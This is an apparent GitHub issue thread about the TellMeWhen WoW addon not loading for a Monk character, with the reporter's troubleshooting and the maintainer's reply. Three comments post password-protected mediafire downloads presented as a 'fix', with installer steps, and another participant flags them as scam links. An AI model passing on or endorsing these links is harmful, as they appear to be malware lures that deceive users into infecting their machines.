### ISSUE TITLE
TMW not loading in correctly (Monk)

### ISSUE THREAD

**Issue by Rhytu** [ascott18/TellMeWhen#2205]
### WoW Version

Retail

### TellMeWhen Version

11.0.5

### Describe the bug

After the most recent update to 11.0.5. I found that TMW did not load my created groups on start-up, or did not load correctly after a loading screen or /reload. This only occurred with my Monk character. It only started to work correctly after I input /tmw, afterwards however, I would keep getting bug alerts from BugSack during gameplay. 
All my other alts seemed to work correctly it was only my monk that was affected.

Things I had tested: Wiping all my groups made for my Monk, Disabling every addon but Bugsack/grabber+Tellmewhen, Reinstalling TellMeWhen, Deleting my WTF folder, resetting options to default and scanning/repairing my game folders. None of these showed results.
I reverted to the prior version (11.0.4) and the issue/fault stopped.
Attached is my BugSack log at the time:
[TellmeWhen Bugsack.txt](https://github.com/user-attachments/files/16777436/TellmeWhen.Bugsack.txt)

The above was just before the most recent reset.

Later, after speaking with Alwies in the Tellmewhen Discord and reading the changelog notes mentioning the largest component of the update was the action bar API change. 
I enabled all action bars in the default UI, emptied them of abilities... but the issue was still present. With this however, in my spellbook I could see that some actions weren't highlighted (to indicate they were present on an action bar somewhere)

For reference, I still use the addon Bartender to make action bars hidden unless on mouseover. I re-enabled bartender and on some unused class action bars, I found the abilities still being used. I removed these and the highlighting in my spellbook returned, but the main issue with Tellmewhen remained present.

Finally I looked up a script/run string to clear all action bars of abilities and found "/run for i = 1,120 do PickupAction(i) PutItemInBackpack() ClearCursor() end"

Once entered, the main issue stopped and my TellMeWhen started loading correctly again.

Later another person in the Monk Tellmewhen Discord channel mentioned he also had the same issue and was not unique to me. 

I hope this helps and sorry for the single bug log, it was the only one I saved during my testing. I hope you find a easy fix in case someone else is also having this issue. P.S. Apologies for any grammatical or punctuation errors. 

Cheers, 

### Export Strings

```text
N/A - If necessary, I can provide my group strings but the issue occurred even without any Groups setup.
```

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alwies** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Scam links on github now -,-

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ascott18** [comment]
Thanks - I added some more safeguards that _should_ completely eliminate this problem? Hard to say with certainty given that its basically impossible to replicate ( I tried - can't put dead spells back on your action bars )
